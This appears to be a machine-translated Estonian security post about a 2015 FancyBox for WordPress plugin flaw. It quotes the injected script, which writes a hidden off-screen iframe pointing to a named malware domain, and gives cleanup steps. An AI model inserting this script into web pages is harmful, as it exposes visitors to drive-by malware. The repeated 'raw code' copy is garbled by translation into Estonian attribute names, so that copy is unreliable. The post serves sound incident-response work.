Nädala alguses saite ja ajaveebe koos WordPress, sai hoiatusi pahavara nakatumine läbi Google'i veebimeistrid.
Probleem, millele Google'i veebimeistrid viitab a olemasolule koda / stsenaarium iframe pahavara allika veebilehtedel.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Tundub, et jutt käib a haavatavus a pistikprogrammomadusFancyBox WordPressi jaoks mida kuni eilseni (05.02.2015) polnud ammu uuendatud.
Selle probleemi lahendamine ja viiruse kohtade desinfitseerimine selle pahavaraga on see suhteliselt lihtne.
1. Keelake FancyBoxi pistikprogramm.
2. Kustutage serverist kõik FancyBoxi pistikprogrammi failid (FTP kaudu)
3. Installige pistikprogrammi uus versioon (FancyBox 3.0.4)
FancyBox for WordPress 3.0.4
– Nimetas ümber sätte, mida mõjutas versioonis 3.0.3 mainitud turbeprobleem. See peaks peatama pahatahtliku koodi ilmumise saitidel, kus pistikprogrammi värskendatakse ilma pahatahtlikku koodi eemaldamata.
FancyBox for WordPress 3.0.3
– Parandatud turvaprobleem.
Pahavara teave:
TÜÜP: Iframe'i ümbersuunamine
SIHT: WordPress Fancybox
PAHVARA DOMEEN: 203koko.eu
PAHVARA URI: http://203koko.eu/hjnfh/ipframe2.php
PAHVARA TOORKOOD: <iframe src=”http://203koko.eu/hjnfh/ipframe2.php” laius=”20″ kõrgus =”30″ ></iframe>
PAHVARA Skript: <stsenaarium>if (navigator.userAgent.match(/msie/i)) { document.write(‘ <div style=”asukoht: absoluutne; vasak: -2000 pikslit; laius: 2000 pikslit”>
Eemaldage oma WordPressi veebisaidilt pahavara.
